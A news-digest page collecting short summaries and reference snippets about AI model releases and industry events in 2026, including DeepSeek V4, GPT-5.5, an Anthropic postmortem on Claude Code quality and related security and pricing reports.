Sources

DeepSeek V4 - almost on the frontier, a fraction of the price simonwillison.net

Chinese AI lab DeepSeek’s last model release was V3.2 (and V3.2 Speciale) last December . They just dropped the first of their hotly anticipated V4 series in the shape of two preview models, DeepSeek-V4-Pro and DeepSeek-V4-Flash . Both models are 1 million token context Mixture of Experts. Pro is 1.6T total parameters, 49B active. Flash is 284B total, 13B active. They’re using the standard MIT license. I think this makes DeepSeek-V4-Pro the new largest open weights model. It’s larger than Kimi…

DeepSeek-V4: a million-token context that agents can actually use huggingface.co

An update on recent Claude Code quality reports simonwillison.net

An update on recent Claude Code quality reports It turns out the high volume of complaints that Claude Code was providing worse quality results over the past two months was grounded in real problems. The models themselves were not to blame, but three separate issues in the Claude Code harness caused complex but material problems which directly affected users. Anthropic’s postmortem describes these in detail. This one in particular stood out to me: On March 26, we shipped a change to clear Claud…

A pelican for GPT-5.5 via the semi-official Codex backdoor API simonwillison.net

GPT-5.5 is out . It’s available in OpenAI Codex and is rolling out to paid ChatGPT subscribers. I’ve had some preview access and found it to be a fast, effective and highly capable model. As is usually the case these days, it’s hard to put into words what’s good about it - I ask it to build things and it builds exactly what I ask for! There’s one notable omission from today’s release - the API: API deployments require different safeguards and we are working closely with partners and customers o…

llm-openai-via-codex 0.1a0 simonwillison.net

Release: llm-openai-via-codex 0.1a0 Hijacks your Codex CLI credentials to make API calls with LLM, as described in my post about GPT-5.5 . Tags: openai , llm , codex-cli

Sign of the future: GPT-5.5 oneusefulthing.org

One impressive step on the curve

Qwen3.6-27B: Flagship-Level Coding in a 27B Dense Model simonwillison.net

Alibaba’s Qwen3.6-27B dense model claims to beat its prior 397B-parameter MoE flagship across coding benchmarks while shrinking from 807GB to 55.6GB. Simon Willison ran the 16.8GB Q4_K_M quant locally via llama-server at roughly 25 tokens/second on a Mac.

Speeding up agentic workflows with WebSockets in the Responses API openai.com

OpenAI details how it cut Codex agent loop overhead by adding WebSocket transport and connection-scoped caching to the Responses API, reducing per-call latency for long-running agentic workflows that repeatedly hit the same model context.

Serving the For You feed simonwillison.net

Bluesky’s For You feed, used by about 72,000 people, runs from a single Go process on a 16-core, 96GB gaming PC in spacecowboy’s living room, fronted by a $7/month OVH VPS over Tailscale, with total operating cost of $30/month.

russellromney/honker simonwillison.net

Russell Romney’s honker is a Rust SQLite extension that ports Postgres-style NOTIFY/LISTEN, durable Kafka-like streams, and the transactional outbox pattern to SQLite, adding 20+ custom SQL functions and using 1ms WAL-file stat polling for near-real-time delivery.

Extract PDF text in your browser with LiteParse for the web simonwillison.net

Simon Willison ported LlamaIndex’s LiteParse PDF text extractor to run entirely in-browser on PDF.js and Tesseract.js, vibe-coded in a 59-minute Claude Code session and deployed via GitHub Pages so files never leave the user’s machine.

It’s a big one simonwillison.net

Simon Willison’s weekly newsletter rounds up an unusually heavy week: 5 blog posts, 8 links, 3 quotes, a new chapter of his Agentic Engineering Patterns guide, plus benchmark images including pelicans on bicycles, a possum on an e-scooter and raccoons with ham radios.

How to Use Transformers.js in a Chrome Extension huggingface.co

Hugging Face publishes a walkthrough for embedding Transformers.js inside a Chrome extension, covering the manifest, service worker setup and model loading required to run inference locally in the browser without server calls.

Here’s how our TPUs power increasingly demanding AI workloads. blog.google

Learn how Google’s TPUs power increasingly demanding AI workloads with this new video.

Millisecond Converter simonwillison.net

Tool: Millisecond Converter LLM reports prompt durations in milliseconds and I got fed up of having to think about how to convert those to seconds and minutes. Tags: tools

Quoting Maggie Appleton simonwillison.net

[…] if you ever needed another reason to learn in public by digital gardening or podcasting or streaming or whathaveyou, add on that people will assume you’re more competent than you are. This will get you invites to very cool exclusive events filled with high-achieving, interesting people, even though you have no right to be there. A+ side benefit. — Maggie Appleton , Gathering Structures ( via ) Tags: blogging , maggie-appleton

References

Artificial Analysis artificialanalysis.ai

GPT-5.5 (xhigh) achieved a record accuracy of 57% on AA Omniscience… while recording an 86% hallucination rate, compared to Claude Opus 4.7’s 36% and Gemini 3.1 Pro’s 50%.

r/vibecoding thread on pricing reddit.com

GPT-5.5 is here — the price doubled but [uses] 40% fewer [output tokens]; effective net hike closer to 20% for most workloads.

Xuepilot blog on Mollick review blog.xuepilot.com

GPT-5.5 could turn a decade of raw research data into a high-quality academic paper in four prompts, yet long-form fiction remained ‘flat,’ ‘uncanny,’ and riddled with repetitive archetypes.

VentureBeat on Anthropic crackdown venturebeat.com

Anthropic formalized its stance by updating Consumer Terms to forbid using Free/Pro/Max OAuth tokens in any product other than the official Claude interface or Claude Code CLI — closing the arbitrage loophole OpenCode had exploited.

BeyondTrust security research beyondtrust.com

A command injection vulnerability in the Codex backend allowed attackers to smuggle bash commands through the GitHub branch parameter and exfiltrate User Access Tokens from the Codex cloud container.

Forbes on Steinberger hire forbes.com

OpenAI hired OpenClaw creator Peter Steinberger and committed to spinning the project into an independent OpenAI-backed foundation — a move analysts read as buying developer loyalty after Anthropic’s blocks.

Artificial Analysis artificialanalysis.ai

DeepSeek V4 Pro and Flash exhibit hallucination rates of 94% and 96% respectively on the AA-Omniscience benchmark; while V4 Pro improved 11 points over V3.2 to a score of -10, the negative score still reflects a model that generates more incorrect than correct answers on adversarial knowledge tasks.

Tom’s Hardware tomshardware.com

DeepSeek launches 1.6 trillion parameter V4 on Huawei chips as US escalates AI theft accusations — Anthropic alleged DeepSeek used over 24,000 fraudulent accounts to run 16 million queries against Claude to extract reasoning and coding capabilities.

Cisco Security blog (legacy R1 evaluation) blogs.cisco.com

DeepSeek-R1 failed to block a single harmful prompt across the HarmBench dataset — a 100% attack success rate — making it roughly 11 times more likely to be exploited by cybercriminals than GPT-4o or Gemini; V4’s safety documentation remains limited compared to U.S. labs’ detailed safety cards.

VentureBeat venturebeat.com

DeepSeek V4 arrives with near-state-of-the-art intelligence at 1/6th the cost of Opus 4.7 / GPT-5.5; V4-Pro reached approximately 91.2% on SWE-bench Verified, placing it in the same tier as Claude Opus 4.7.

Apidog deployment guide apidog.com

Unsloth’s dynamic quantization shrinks V4-Flash to roughly 157–160GB, making 128GB M-series MacBooks viable only with aggressive 2-bit quants; users must set min_p=0.05 and temperature ~0.6 or 1.58-bit versions produce ‘rare token’ incoherence.

VentureBeat venturebeat.com

An April 16 system prompt instruction told the model to ‘keep text between tool calls to ≤25 words’ and final responses to ≤100 words — a verbosity cap that produced a measurable ~3% drop in coding evaluations before being rolled back on April 20.

Business Insider businessinsider.com

Anthropic explicitly denies that it ever degrades models for capacity or cost-management reasons, framing the regressions as unintended consequences of latency optimizations rather than ‘nerfing.’

Forbes / Veracode analysis forbes.com

Veracode found Claude Opus 4.7 introduced security vulnerabilities in 52% of tested coding tasks — nearly double the rate of comparable OpenAI models — raising questions about quality even after the harness fixes.

Medium — ‘Anthropic Admitted Claude Code Broke: We Were Right’ medium.com

AMD senior director Stella Laurenzo published an audit of 6,850+ Claude Code sessions and 234,000 tool calls showing a sharp shift from ‘research-first’ to ‘lazy edit-first’ behavior — external evidence that forced Anthropic past its initial ‘skill issue’ dismissals.

Tessl blog tessl.io

This is Anthropic’s second major quality postmortem in seven months — September 2025 blamed TPU compiler bugs and context-routing errors for similar ‘nerfing’ complaints, suggesting a recurring pattern where serving-stack changes silently degrade model behavior.

findskill.ai summary of HN thread 47878905 findskill.ai

Top HN commenters reacted with ‘you weren’t dogfooding?!’ and accused Anthropic of gaslighting users for weeks; Boris Cherny from the Claude Code team replied that the cache-clearing change was meant to protect users from runaway costs in 900k+ token contexts.

Sources

References

Jack Sun, writing.